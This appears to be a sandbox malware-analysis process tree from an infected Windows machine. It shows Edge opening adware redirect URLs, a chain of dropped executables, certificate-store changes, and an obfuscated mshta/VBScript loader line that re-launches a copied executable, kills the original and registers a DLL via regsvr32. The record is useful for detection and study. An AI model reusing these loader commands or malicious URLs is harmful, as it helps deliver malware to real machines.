        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,15522794795659855686,15907120105591480214,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:3
        10⤵
        
        PID:2236
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2088,15522794795659855686,15907120105591480214,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2684 /prefetch:8
        10⤵
        
        PID:1632
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,15522794795659855686,15907120105591480214,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3664 /prefetch:1
        10⤵
        
        PID:5772
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,15522794795659855686,15907120105591480214,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3760 /prefetch:1
        10⤵
        
        PID:1344
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,15522794795659855686,15907120105591480214,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4948 /prefetch:1
        10⤵
        
        PID:5728
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,15522794795659855686,15907120105591480214,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5068 /prefetch:1
        10⤵
        
        PID:3660
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,15522794795659855686,15907120105591480214,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4356 /prefetch:1
        10⤵
        
        PID:5800
        
        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2088,15522794795659855686,15907120105591480214,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2636 /prefetch:8
        10⤵
        
        PID:3504
        
        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2088,15522794795659855686,15907120105591480214,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2636 /prefetch:8
        10⤵
        
        PID:3096
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,15522794795659855686,15907120105591480214,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1860 /prefetch:2
        10⤵
        
        PID:10032
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,15522794795659855686,15907120105591480214,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4932 /prefetch:1
        10⤵
        
        PID:10988
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,15522794795659855686,15907120105591480214,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4784 /prefetch:1
        10⤵
        
        PID:12392
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,15522794795659855686,15907120105591480214,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3824 /prefetch:1
        10⤵
        
        PID:12992
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,15522794795659855686,15907120105591480214,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5696 /prefetch:1
        10⤵
        
        PID:10032
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,15522794795659855686,15907120105591480214,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5272 /prefetch:1
        10⤵
        
        PID:4568
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,15522794795659855686,15907120105591480214,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5524 /prefetch:1
        10⤵
        
        PID:14504
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,15522794795659855686,15907120105591480214,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4044 /prefetch:1
        10⤵
        
        PID:14704
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,15522794795659855686,15907120105591480214,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4024 /prefetch:1
        10⤵
        
        PID:9156
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,15522794795659855686,15907120105591480214,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5952 /prefetch:1
        10⤵
        
        PID:5464
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,15522794795659855686,15907120105591480214,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5896 /prefetch:1
        10⤵
        
        PID:15952
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,15522794795659855686,15907120105591480214,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5288 /prefetch:1
        10⤵
        
        PID:22100
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,15522794795659855686,15907120105591480214,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6244 /prefetch:1
        10⤵
        
        PID:23240
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,15522794795659855686,15907120105591480214,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5876 /prefetch:1
        10⤵
        
        PID:11156
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,15522794795659855686,15907120105591480214,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5040 /prefetch:1
        10⤵
        
        PID:26564
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,15522794795659855686,15907120105591480214,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5328 /prefetch:1
        10⤵
        
        PID:23292
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,15522794795659855686,15907120105591480214,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1040 /prefetch:1
        10⤵
        
        PID:29980
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,15522794795659855686,15907120105591480214,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4032 /prefetch:1
        10⤵
        
        PID:11448
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2088,15522794795659855686,15907120105591480214,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6844 /prefetch:8
        10⤵
        
        PID:31724
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
        9⤵
        
        PID:13944
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff864dd46f8,0x7ff864dd4708,0x7ff864dd4718
        10⤵
        
        PID:14188
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851483
        9⤵
        
        PID:16424
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff864dd46f8,0x7ff864dd4708,0x7ff864dd4718
        10⤵
        
        PID:10124
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851513
        9⤵
        
        PID:15108
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff864dd46f8,0x7ff864dd4708,0x7ff864dd4718
        10⤵
        
        PID:8256
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=2087215
        9⤵
        
        PID:33916
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff864dd46f8,0x7ff864dd4708,0x7ff864dd4718
        10⤵
        
        PID:33700
        
        C:\Users\Admin\AppData\Local\Temp\6a-08fd6-7fe-6b992-3f40dd4bd78e8\Xydisagavi.exe
        
        "C:\Users\Admin\AppData\Local\Temp\6a-08fd6-7fe-6b992-3f40dd4bd78e8\Xydisagavi.exe"
        8⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5552
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5hbzxrta.thq\GcleanerEU.exe /eufive & exit
        9⤵
        
        PID:2180
        
        C:\Users\Admin\AppData\Local\Temp\5hbzxrta.thq\GcleanerEU.exe
        
        C:\Users\Admin\AppData\Local\Temp\5hbzxrta.thq\GcleanerEU.exe /eufive
        10⤵
        Executes dropped EXE
        
        PID:5972
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5972 -s 276
        11⤵
        Program crash
        
        PID:5968
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lcupvnp1.pao\installer.exe /qn CAMPAIGN="654" & exit
        9⤵
        
        PID:6060
        
        C:\Users\Admin\AppData\Local\Temp\lcupvnp1.pao\installer.exe
        
        C:\Users\Admin\AppData\Local\Temp\lcupvnp1.pao\installer.exe /qn CAMPAIGN="654"
        10⤵
        Executes dropped EXE
        Loads dropped DLL
        Enumerates connected drives
        Modifies system certificate store
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:4356
        
        C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\lcupvnp1.pao\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\lcupvnp1.pao\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1630560308 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
        11⤵
        
        PID:5488
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wc1knklz.wa2\anyname.exe & exit
        9⤵
        
        PID:5732
        
        C:\Users\Admin\AppData\Local\Temp\wc1knklz.wa2\anyname.exe
        
        C:\Users\Admin\AppData\Local\Temp\wc1knklz.wa2\anyname.exe
        10⤵
        Executes dropped EXE
        
        PID:5884
        
        C:\Users\Admin\AppData\Local\Temp\wc1knklz.wa2\anyname.exe
        
        "C:\Users\Admin\AppData\Local\Temp\wc1knklz.wa2\anyname.exe" -u
        11⤵
        Executes dropped EXE
        
        PID:6056
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0ta1lm4s.elf\BsInstFile.exe & exit
        9⤵
        
        PID:4896
        
        C:\Users\Admin\AppData\Local\Temp\0ta1lm4s.elf\BsInstFile.exe
        
        C:\Users\Admin\AppData\Local\Temp\0ta1lm4s.elf\BsInstFile.exe
        10⤵
        
        PID:1656
        
        C:\Users\Admin\AppData\Roaming\8446919.exe
        
        "C:\Users\Admin\AppData\Roaming\8446919.exe"
        11⤵
        Executes dropped EXE
        
        PID:2976
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 2976 -s 2236
        12⤵
        Program crash
        
        PID:5052
        
        C:\Users\Admin\AppData\Roaming\7470346.exe
        
        "C:\Users\Admin\AppData\Roaming\7470346.exe"
        11⤵
        
        PID:4180
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3br4mwcq.dz0\askinstall52.exe & exit
        9⤵
        
        PID:1796
        
        C:\Users\Admin\AppData\Local\Temp\3br4mwcq.dz0\askinstall52.exe
        
        C:\Users\Admin\AppData\Local\Temp\3br4mwcq.dz0\askinstall52.exe
        10⤵
        
        PID:3176
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3176 -s 1820
        11⤵
        Program crash
        
        PID:5024
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lfrspp3h.ytz\cleanpro13.exe & exit
        9⤵
        
        PID:2184
        
        C:\Users\Admin\AppData\Local\Temp\lfrspp3h.ytz\cleanpro13.exe
        
        C:\Users\Admin\AppData\Local\Temp\lfrspp3h.ytz\cleanpro13.exe
        10⤵
        
        PID:5352
        
        C:\Users\Admin\Documents\3PSBuqBGTndjarSBzHYWJgx8.exe
        
        "C:\Users\Admin\Documents\3PSBuqBGTndjarSBzHYWJgx8.exe"
        11⤵
        
        PID:1900
        
        C:\Users\Admin\Documents\n8r0iSjpJwRbJ4CZRQpiuYz0.exe
        
        "C:\Users\Admin\Documents\n8r0iSjpJwRbJ4CZRQpiuYz0.exe"
        11⤵
        
        PID:2340
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2340 -s 280
        12⤵
        Program crash
        
        PID:2056
        
        C:\Users\Admin\Documents\qiCrFAFRwJBIJwCIFBi2lJr4.exe
        
        "C:\Users\Admin\Documents\qiCrFAFRwJBIJwCIFBi2lJr4.exe"
        11⤵
        
        PID:2264
        
        C:\Users\Admin\Documents\xCZ5B9BGcaWSqPIDhW_2iHAE.exe
        
        "C:\Users\Admin\Documents\xCZ5B9BGcaWSqPIDhW_2iHAE.exe"
        11⤵
        
        PID:1800
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VbScRIpt: CloSE ( CReATEobJECT ( "WscrIpt.SheLL").Run( "cmD.exe /Q /c TYPE ""C:\Users\Admin\Documents\xCZ5B9BGcaWSqPIDhW_2iHAE.exe"" > X4d4XArNWDu.eXE&& StArt X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV & if """"== """" for %A IN (""C:\Users\Admin\Documents\xCZ5B9BGcaWSqPIDhW_2iHAE.exe"" ) do taskkill /f -im ""%~nxA"" " , 0, trUE ) )
        12⤵
        
        PID:6200
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /Q /c TYPE "C:\Users\Admin\Documents\xCZ5B9BGcaWSqPIDhW_2iHAE.exe"> X4d4XArNWDu.eXE&& StArt X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV &if ""== "" for %A IN ("C:\Users\Admin\Documents\xCZ5B9BGcaWSqPIDhW_2iHAE.exe" ) do taskkill /f -im "%~nxA"
        13⤵
        
        PID:6688
        
        C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXE
        
        X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV
        14⤵
        
        PID:6412
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VbScRIpt: CloSE ( CReATEobJECT ( "WscrIpt.SheLL").Run( "cmD.exe /Q /c TYPE ""C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXE"" > X4d4XArNWDu.eXE&& StArt X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV & if ""-PXPoqL0iOUHHP7hXFattB5ZvsV ""== """" for %A IN (""C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXE"" ) do taskkill /f -im ""%~nxA"" " , 0, trUE ) )
        15⤵
        
        PID:2800
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /Q /c TYPE "C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXE"> X4d4XArNWDu.eXE&& StArt X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV &if "-PXPoqL0iOUHHP7hXFattB5ZvsV "== "" for %A IN ("C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXE" ) do taskkill /f -im "%~nxA"
        16⤵
        
        PID:5672
        
        C:\Windows\SysWOW64\regsvr32.exe
        
        "C:\Windows\System32\regsvr32.exe" -S fOUT6o7J.Mj
        15⤵
        
        PID:2012
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f -im "xCZ5B9BGcaWSqPIDhW_2iHAE.exe"
        14⤵
        Kills process with taskkill
        
        PID:6084
        
        C:\Users\Admin\Documents\zzRIYtYG4ttMW1yUpSvh81zH.exe
        
        "C:\Users\Admin\Documents\zzRIYtYG4ttMW1yUpSvh81zH.exe"
        11⤵
        
        PID:5284
        
        C:\Users\Admin\Documents\l0BGeAte0WBq3zjQ_llxqNAK.exe
        
        "C:\Users\Admin\Documents\l0BGeAte0WBq3zjQ_llxqNAK.exe"
        11⤵
        
        PID:5520
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5520 -s 272
        12⤵
        Program crash
        
        PID:5868
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        "C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe"
        11⤵
        
        PID:1032
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:6900
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:7092
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:6612
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:720
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:6556
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:6708
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:7788
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:7812
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:7832
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:5408
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:4380
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:7348
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:8748
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:5676
        
